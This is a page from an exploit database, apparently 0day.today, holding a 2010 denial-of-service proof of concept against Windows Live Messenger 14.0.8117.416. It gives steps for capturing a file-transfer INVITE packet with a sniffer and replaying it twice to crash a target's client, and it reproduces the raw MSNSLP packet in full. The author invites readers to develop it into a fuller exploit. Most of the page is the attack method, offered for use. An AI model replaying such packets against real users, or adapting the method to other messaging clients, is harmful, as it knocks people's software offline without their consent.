[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Windows Live Messenger 14.0.8117.416 DoS

Author
Morad Quraan
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12315
Category
dos / poc
Date add
20-05-2010
Platform
windows
========================================
Windows Live Messenger 14.0.8117.416 DoS
========================================


###### ########## ######## ############ ######### ###### ##### ###### #######

# Software : Windows Live Messenger 14.0.8117.416
# Found by : Mr Ha1 / Morad Quraan
# Date: May 20, 2010
# Site : http://download.live.com/?sku=messenger
# Tested on: Windows xp & vista
#
# Greats to my luv 22 & Xprince & Aousq & Ahmadmars & Abuomar .......
####### #### #### ######## ###### ##### ###### #######
 ## ##### ###### #######


first this bug crash Windows Live Messenger 14.0.8117.416 with no error

1- set some packet sniffer to catch packet and send it twice to the target
2- Send File to some one who got wlm
3- ur sniffer should get this packet and send it back again to same person twice

UUN 15 target@hotmail.com;{f8f4df9e-1988-4f98-ac87-b41dd78cfdde} 3 762..INVITE MSNMSGR:target@hotmail.com;{f8f4df9e-1988-4f98-ac87-b41dd78cfdde} MSNSLP/1.0..To: <msnmsgr:target@hotmail.com;{f8f4df9e-

1988-4f98-ac87-b41dd78cfdde}>..From: <msnmsgr:webmaster@arabicsecurity.com;{f8f4df9e-1988-4f98-ac87-b41dd78cfdde}>..Via: MSNSLP/1.0/TLP ;branch={FE5D1979-D628-49A8-8214-1F2CE245EF4F}..CSeq: 0

..Call-ID: {86D2B883-6E99-43E8-ADA7-9CDA4B1F1F63}..Max-Forwards: 0..Content-Type: application/x-msnmsgr-transreqbody..Content-Length: 301....NetID: 1389145423..Conn-Type: Port-Restrict-NAT..TCP-Conn-

Type: Port-Restrict-NAT..UPnPNat: true..ICF: false..IPv6-global: ..Capabilities-Flags: 1..Nat-Trav-Msg-Type: WLX-Nat-Trav-Msg-Direct-Connect-Req..Bridges: TRUDPv1 TCPv1 SBBridge TURNv1..Hashed-Nonce:

{8644B18B-F268-2C91-643B-2FFE90AF99D9}....

4- ur target wlm will shutdown with no error


i didnt make any exploit for this bug coz it will take some time and i dont have time
think ur way to exploit it ....... Gl





#  0day.today [2024-12-24]  #